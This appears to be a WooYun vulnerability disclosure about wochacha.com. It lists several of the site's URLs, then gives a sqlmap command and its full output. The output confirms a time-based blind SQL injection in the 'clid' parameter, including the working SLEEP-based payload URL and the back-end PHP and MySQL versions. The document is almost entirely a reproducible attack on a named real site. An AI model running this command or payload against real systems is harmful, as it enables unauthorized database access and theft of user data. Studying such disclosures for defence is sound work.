WooYun.org

http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209

http://www.wochacha.com/index.php?m=Question&a=index&category=80

http://www.wochacha.com/index/search?q=1

http://www.wochacha.com/m/brand?brand_id=

http://www.wochacha.com/directsale/search?tp1=34

http://www.wochacha.com/index/search?tp1=4&tp2=0

python sqlmap.py -u "http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209*"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150803}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:36:44
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[13:36:46] [INFO] testing connection to the target URL
[13:36:46] [INFO] testing if the target URL is stable
[13:36:47] [INFO] target URL is stable
[13:36:47] [INFO] testing if URI parameter '#1*' is dynamic
[13:36:47] [INFO] confirming that URI parameter '#1*' is dynamic
[13:36:48] [INFO] URI parameter '#1*' is dynamic
[13:36:48] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[13:36:48] [INFO] testing for SQL injection on URI parameter '#1*'
[13:36:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:36:49] [INFO] heuristics detected web page charset 'ascii'
[13:36:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[13:36:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[13:37:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:37:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:37:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:37:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[13:37:21] [INFO] testing 'MySQL inline queries'
[13:37:21] [INFO] testing 'PostgreSQL inline queries'
[13:37:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:37:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[13:37:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:37:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:37:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:37:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[13:37:51] [INFO] URI parameter '#1*' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values?
[Y/n] n
[13:37:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:37:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one othe
r (potential) technique found
[13:38:12] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.wochacha.com:80/index/search?tp1=4&tp2=0&clid=1209' AND (SELECT * FROM (SELECT(SLEEP(5)))GCJH) A
ND 'bYXD'='bYXD
---
[13:38:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[13:38:34] [INFO] fetched data logged to text files under 
[*] shutting down at 13:38:34